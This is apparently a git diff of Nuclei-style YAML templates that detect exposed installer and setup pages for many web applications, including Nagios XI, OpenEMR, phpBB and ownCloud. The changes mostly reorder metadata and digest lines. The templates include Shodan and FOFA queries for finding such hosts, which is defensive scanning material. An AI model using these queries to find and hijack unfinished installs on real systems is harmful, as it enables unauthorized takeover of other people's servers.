ritikchaddha severity: high description: Nagios XI is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Nagios XI" - product: nagios_xi vendor: nagios + product: nagios_xi + shodan-query: title:"Nagios XI" tags: misconfig,exposure,install,nagiosxi - classification: - cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index 7c964203db..e40562fa3d 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: NodeBB Web is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"NodeBB Web Installer" - product: nodebb vendor: nodebb + product: nodebb + shodan-query: title:"NodeBB Web Installer" tags: misconfig,nodebb,install,exposure - classification: - cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml index ba84be1d13..a47778409a 100644 --- a/http/misconfiguration/installer/octoprint-installer.yaml +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Checks for the presence of a OctoPrint Installer Page. + classification: + cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Thank you for installing OctoPrint" - product: octoprint vendor: octoprint + product: octoprint + fofa-query: body="Thank you for installing OctoPrint" tags: install,octoprint,misconfig - classification: - cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml index 3d61f919d9..a597aca259 100644 --- a/http/misconfiguration/installer/ojs-installer.yaml +++ b/http/misconfiguration/installer/ojs-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: high description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.favicon.hash:2099342476 - product: open_journal_systems vendor: openjournalsystems + product: open_journal_systems + shodan-query: http.favicon.hash:2099342476 tags: misconfig,ojs,install,exposure - classification: - cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml index e3947628e7..38f593ed55 100644 --- a/http/misconfiguration/installer/onlyoffice-installer.yaml +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed OnlyOffice Setup page. reference: - https://www.onlyoffice.com/ + classification: + cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Portal Setup" - product: onlyoffice vendor: onlyoffice + product: onlyoffice + shodan-query: html:"Portal Setup" tags: misconfig,install,exposure,onlyoffice - classification: - cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml index acd91de701..6272299428 100644 --- a/http/misconfiguration/installer/openemr-setup-installer.yaml +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed OpenEMR setup installation pages which could allow unauthorized access or information disclosure. reference: - https://www.open-emr.org/ + classification: + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"OpenEMR Setup Tool" - product: openemr vendor: open-emr + product: openemr + shodan-query: title:"OpenEMR Setup Tool" tags: misconfig,install,exposure,openemr - classification: - cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml index 2b6e07d8ba..9c22fc906d 100644 --- a/http/misconfiguration/installer/openfire-setup.yaml +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Checks for the presence of a Openfire Setup Page. + classification: + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Welcome to Openfire Setup" - product: openfire vendor: igniterealtime + product: openfire + shodan-query: html:"Welcome to Openfire Setup" tags: install,openfire,exposure,misconfig - classification: - cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index 9671ef5527..b128e86b81 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: OpenMage is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:openmage:openmage:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"OpenMage Installation Wizard" - product: openmage vendor: openmage + product: openmage + shodan-query: title:"OpenMage Installation Wizard" tags: misconfig,openmage,install,exposure - classification: - cpe: cpe:2.3:a:openmage:openmage:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index 1ca6a4b7c7..da68dde354 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: openSIS is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"openSIS" - product: opensis vendor: os4ed + product: opensis + shodan-query: title:"openSIS" tags: misconfig,opensis,install,exposure - classification: - cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index 62fa65eafb..3fcd57e604 100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: OrangeHrm is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"OrangeHRM Web Installation Wizard" - product: orangehrm vendor: orangehrm + product: orangehrm + shodan-query: http.title:"OrangeHRM Web Installation Wizard" tags: misconfig,exposure,install,orangehrm - classification: - cpe: cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/orangescrum-install.yaml b/http/misconfiguration/installer/orangescrum-install.yaml index b78c5d8d0d..c8fa4ec32f 100644 --- a/http/misconfiguration/installer/orangescrum-install.yaml +++ b/http/misconfiguration/installer/orangescrum-install.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Orangescrum is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:orangescrum:orangescrum:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Orangescrum Setup Wizard" - product: orangescrum vendor: orangescrum + product: orangescrum + shodan-query: title:"Orangescrum Setup Wizard" tags: misconfig,orangescrum,install - classification: - cpe: cpe:2.3:a:orangescrum:orangescrum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 6ce153ec4b..4894bfb757 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Orchard is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:orchardproject:orchard:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Orchard Setup - Get Started" - product: orchard vendor: orchardproject + product: orchard + shodan-query: html:"Orchard Setup - Get Started" tags: misconfig,exposure,install,orchard - classification: - cpe: cpe:2.3:a:orchardproject:orchard:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 21579a6bf9..2aa001f24e 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: OwnCloud is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"owncloud" - product: owncloud vendor: owncloud + product: owncloud + shodan-query: title:"owncloud" tags: misconfig,owncloud,exposure,install - classification: - cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index d18ecc6787..2772a39c26 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Oxid EShop is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"OXID eShop installation" - product: eshop vendor: oxid-esales + product: eshop + shodan-query: title:"OXID eShop installation" tags: misconfig,oxid,eshop,install,exposure - classification: - cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index c40ec24d36..856fa8bb70 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -7,16 +7,16 @@ info: description: Pagekit is susceptible to the Installation page exposure due to misconfiguration. reference: - https://github.com/pagekit/pagekit + classification: + cpe: cpe:2.3:a:pagekit:pagekit:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Pagekit Installer" - product: pagekit vendor: pagekit + product: pagekit + shodan-query: title:"Pagekit Installer" tags: misconfig,pagekit,install,exposure - classification: - cpe: cpe:2.3:a:pagekit:pagekit:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml index fca795cd71..c3b5f5bcb8 100644 --- a/http/misconfiguration/installer/pandora-fms-installer.yaml +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed Pandora FMS installation page. reference: - https://pandorafms.com/en/ + classification: + cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Pandora FMS - Installation Wizard" - product: pandora_fms vendor: pandorafms + product: pandora_fms + fofa-query: body="Pandora FMS - Installation Wizard" tags: misconfig,install,exposure,pandora-fms - classification: - cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index 7120742045..dece072ce2 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: high description: Permissions Installer is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:suse:permissions:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:" Permissions | Installer" - product: permissions vendor: suse + product: permissions + shodan-query: title:" Permissions | Installer" tags: misconfig,permissions,install,exposure - classification: - cpe: cpe:2.3:a:suse:permissions:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index ccf22d4876..afded9361d 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: phpBB is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Installation Panel" - product: phpbb vendor: phpbb + product: phpbb + shodan-query: html:"Installation Panel" tags: misconfig,phpbb,install,exposure - classification: - cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/phpgedview-installer.yaml b/http/misconfiguration/installer/phpgedview-installer.yaml index 8f1994632a..521730d1c2 100644 --- a/http/misconfiguration/installer/phpgedview-installer.yaml +++ b/http/misconfiguration/installer/phpgedview-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: PhpGedView is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:phpgedview:phpgedview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"/phpgedview.db" - product: phpgedview vendor: phpgedview + product: phpgedview + shodan-query: html:"/phpgedview.db" tags: misconfig,phpgedview,install,exposure - classification: - cpe: cpe:2.3:a:phpgedview:phpgedview:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/phpipam-installer.yaml b/http/misconfiguration/installer/phpipam-installer.yaml index c5ded7e750..f542c176a6 100644 --- a/http/misconfiguration/installer/phpipam-installer.yaml +++ b/http/misconfiguration/installer/phpipam-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | PHP IPAM is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"phpipam installation wizard" - product: phpipam vendor: phpipam + product: phpipam + shodan-query: html:"phpipam installation wizard" tags: misconfig,exposure,install,phpipam - classification: - cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml index a91d92aec4..e3ca679fa8 100644 --- a/http/misconfiguration/installer/phpmyfaq-installer.yaml +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: phpMyFAQ installation is exposed. + classification: + cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: "phpMyFAQ-setup" - product: phpmyfaq vendor: phpmyfaq + product: phpmyfaq + fofa-query: "phpMyFAQ-setup" tags: misconfig,phpmyfaq,install - classification: - cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: part: header words: - 'phpmyfaq-setup' -# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index 938049e536..514dd6bb05 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: phpwind is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:phpwind:phpwind:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Powered by phpwind" - product: phpwind vendor: phpwind + product: phpwind + shodan-query: title:"Powered by phpwind" tags: misconfig,phpwind,exposure,install - classification: - cpe: cpe:2.3:a:phpwind:phpwind:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index 4a1a23aacb..13e6575a23 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Piwigo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Piwigo" html:"- Installation" - product: piwigo vendor: piwigo + product: piwigo + shodan-query: html:"Piwigo" html:"- Installation" tags: misconfig,exposure,install,piwigo - classification: - cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950 + +# digest: 